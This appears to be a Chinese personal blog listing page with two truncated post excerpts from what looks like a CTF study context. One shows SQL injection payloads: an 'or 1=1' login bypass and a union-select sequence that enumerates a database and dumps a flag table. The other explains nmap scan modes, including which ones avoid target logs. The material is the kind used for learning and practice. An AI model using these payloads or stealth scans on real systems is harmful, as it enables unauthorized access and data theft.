SQL注入攻击

- 万能密码 'or 1 = 1 #- 联合查询注入 # 获取返回的字段位置 'union select 1,2,3------ # --查看回显确定 # 获取当前数据库名字,以第二个为回显为例 'union select 1,database(),3; # --回显'web2' # 查看数据库中的表名 'union select 1,table_name,3 from information_schema.tables where table_schema =database(); # --回显flag,user # 查看flag表中的列名 'union select 1,column_name,3 from information_schema.columns where table_name ='flag';# --回显flag # 拿到flag 'union select 1,flag,3 from flag;#PS:mysql 的 information_schema库中记录了其它数据库的结构​tables记录了数据表和数据库的

技术 2023-11-08

NOOB爆破

一、扫描端口1.ip a查看自己ip获取网段192.18.128.0/162.端口扫描命令 nmap参数 -sT TCP connect() 扫描,这是最基本的 TCP 扫描方式。这种扫描很容易被检测到,在目标主机的日志中会记录大批的连接请求以及错误信息。 -sS TCP 同步扫描 (TCP SYN),因为不必全部打开一个 TCP 连接,所以这项技术通常称为半开扫描 (half-open)。这项技术最大的好处是,很少有系统能够把这记入系统日志。不过,你需要 root 权限来定制 SYN 数据包。 -sF,-sX,-sN 秘密 FIN 数据包扫描、圣诞树 (Xmas Tree)、空 (Null) 扫描模式。这些扫描方式的理论依据是:关闭的端口需要对你的探测包回应 RST 包,而打开的端口必需忽略有问题的包(参考 RFC 793 第 64 页)。 -sP ping 扫描,用 ping 方式检查网络上哪些主机正在运行。当主机阻塞 ICMP echo 请求包是 ping 扫描是无效的。nmap 在任何情况下都会进行 ping 扫描,只有目标主机处

技术 2023-11-08
© 2023 - 2026 Flower Nianyu. All Rights Reserved.